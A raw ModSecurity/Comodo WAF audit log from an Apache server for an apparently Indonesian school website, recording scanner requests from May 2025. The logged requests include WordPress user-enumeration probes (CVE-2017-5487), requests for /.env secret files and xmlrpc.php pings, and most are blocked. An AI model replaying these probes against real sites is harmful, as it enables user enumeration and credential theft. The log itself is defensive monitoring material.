POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4958427-C-- demo.sayHello --e4958427-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4958427-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746736532121975 5353 (- - -) Stopwatch2: 1746736532121975 5353; combined=3984, p1=532, p2=3232, p3=20, p4=24, p5=101, sr=77, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4958427-Z-- --00f99d14-A-- [09/May/2025:03:38:01 +0700] aB0WKR6q_ZMebht3q15KNgAAAJI 103.236.140.4 56388 103.236.140.4 8181 --00f99d14-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 189.204.126.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 189.204.126.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --00f99d14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00f99d14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746736681261483 3185 (- - -) Stopwatch2: 1746736681261483 3185; combined=1328, p1=455, p2=844, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00f99d14-Z-- --3953c426-A-- [09/May/2025:03:44:29 +0700] aB0XrR6q_ZMebht3q15KNwAAAJM 103.236.140.4 56448 103.236.140.4 8181 --3953c426-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 206.84.42.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 206.84.42.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3953c426-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3953c426-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746737069752127 3428 (- - -) Stopwatch2: 1746737069752127 3428; combined=1422, p1=478, p2=914, p3=0, p4=0, p5=30, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3953c426-Z-- --e8473374-A-- [09/May/2025:03:45:38 +0700] aB0X8i-fAO47ojYKsMoLPAAAAFI 103.236.140.4 56454 103.236.140.4 8181 --e8473374-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept-Charset: utf-8 --e8473374-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8473374-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746737138502648 867 (- - -) Stopwatch2: 1746737138502648 867; combined=341, p1=300, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8473374-Z-- --4b234f01-A-- [09/May/2025:04:25:58 +0700] aB0hZi-fAO47ojYKsMoLYgAAAEM 103.236.140.4 56744 103.236.140.4 8181 --4b234f01-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 143.110.217.244 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 143.110.217.244 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --4b234f01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b234f01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746739558715365 860 (- - -) Stopwatch2: 1746739558715365 860; combined=345, p1=310, p2=0, p3=0, p4=0, p5=34, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b234f01-Z-- --2acdee19-A-- [09/May/2025:04:42:30 +0700] aB0lRi-fAO47ojYKsMoLlAAAAEY 103.236.140.4 56966 103.236.140.4 8181 --2acdee19-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.122.228.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.122.228.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2acdee19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2acdee19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746740550957770 2333 (- - -) Stopwatch2: 1746740550957770 2333; combined=1093, p1=342, p2=726, p3=0, p4=0, p5=25, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2acdee19-Z-- --88512e65-A-- [09/May/2025:04:46:23 +0700] aB0mLy-fAO47ojYKsMoLpQAAAE4 103.236.140.4 57034 103.236.140.4 8181 --88512e65-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.224.183.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.224.183.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --88512e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88512e65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746740783536209 2637 (- - -) Stopwatch2: 1746740783536209 2637; combined=1240, p1=410, p2=800, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88512e65-Z-- --d08fd805-A-- [09/May/2025:04:53:20 +0700] aB0n0FoC-7ITMWTA_c9yoAAAAMM 103.236.140.4 57120 103.236.140.4 8181 --d08fd805-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d08fd805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d08fd805-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746741200800321 2893 (- - -) Stopwatch2: 1746741200800321 2893; combined=1222, p1=416, p2=776, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d08fd805-Z-- --e2390c31-A-- [09/May/2025:04:53:29 +0700] aB0n2R6q_ZMebht3q15KawAAAIE 103.236.140.4 57126 103.236.140.4 8181 --e2390c31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e2390c31-C-- demo.sayHello --e2390c31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2390c31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746741209128567 5071 (- - -) Stopwatch2: 1746741209128567 5071; combined=3940, p1=469, p2=3260, p3=29, p4=31, p5=89, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2390c31-Z-- --abdd4b70-A-- [09/May/2025:04:54:05 +0700] aB0n_R6q_ZMebht3q15KbQAAAII 103.236.140.4 57134 103.236.140.4 8181 --abdd4b70-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.216.187.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.216.187.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --abdd4b70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abdd4b70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746741245474763 3491 (- - -) Stopwatch2: 1746741245474763 3491; combined=1470, p1=493, p2=946, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abdd4b70-Z-- --4b234f01-A-- [09/May/2025:04:54:08 +0700] aB0oAB6q_ZMebht3q15KbgAAAIQ 103.236.140.4 57136 103.236.140.4 8181 --4b234f01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4b234f01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b234f01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746741248596050 2742 (- - -) Stopwatch2: 1746741248596050 2742; combined=1222, p1=405, p2=789, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b234f01-Z-- --63a14450-A-- [09/May/2025:04:54:18 +0700] aB0oCi-fAO47ojYKsMoLugAAAFc 103.236.140.4 57142 103.236.140.4 8181 --63a14450-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --63a14450-C-- demo.sayHello --63a14450-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --63a14450-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746741258056146 5339 (- - -) Stopwatch2: 1746741258056146 5339; combined=3965, p1=569, p2=3185, p3=23, p4=26, p5=94, sr=141, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63a14450-Z-- --57ad8800-A-- [09/May/2025:04:56:39 +0700] aB0ol1qQ1nOVx9fWpZS3ZgAAABM 103.236.140.4 57162 103.236.140.4 8181 --57ad8800-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --57ad8800-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57ad8800-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746741399111215 3134 (- - -) Stopwatch2: 1746741399111215 3134; combined=1367, p1=510, p2=827, p3=0, p4=0, p5=30, sr=157, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ad8800-Z-- --755d3237-A-- [09/May/2025:04:56:46 +0700] aB0onlqQ1nOVx9fWpZS3aAAAABY 103.236.140.4 57170 103.236.140.4 8181 --755d3237-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --755d3237-C-- demo.sayHello --755d3237-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --755d3237-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746741406236161 5673 (- - -) Stopwatch2: 1746741406236161 5673; combined=4403, p1=561, p2=3644, p3=34, p4=37, p5=73, sr=132, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --755d3237-Z-- --d1a5b706-A-- [09/May/2025:05:26:18 +0700] aB0vii-fAO47ojYKsMoL2wAAAFA 103.236.140.4 57430 103.236.140.4 8181 --d1a5b706-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 163.53.81.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 163.53.81.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1a5b706-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1a5b706-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746743178915227 3518 (- - -) Stopwatch2: 1746743178915227 3518; combined=1451, p1=472, p2=948, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1a5b706-Z-- --26087a1d-A-- [09/May/2025:05:32:13 +0700] aB0w7R6q_ZMebht3q15KnQAAAJQ 103.236.140.4 58456 103.236.140.4 8181 --26087a1d-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 167.99.210.137 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --26087a1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26087a1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746743533935136 799 (- - -) Stopwatch2: 1746743533935136 799; combined=313, p1=279, p2=0, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26087a1d-Z-- --20291055-A-- [09/May/2025:05:32:19 +0700] aB0w8y-fAO47ojYKsMoMlAAAAE0 103.236.140.4 58468 103.236.140.4 8181 --20291055-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.94.224.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.94.224.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --20291055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20291055-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746743539475528 2139 (- - -) Stopwatch2: 1746743539475528 2139; combined=957, p1=301, p2=630, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20291055-Z-- --8c375b04-A-- [09/May/2025:05:55:46 +0700] aB02cloC-7ITMWTA_c9z_wAAAMA 103.236.140.4 58696 103.236.140.4 8181 --8c375b04-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8c375b04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c375b04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] 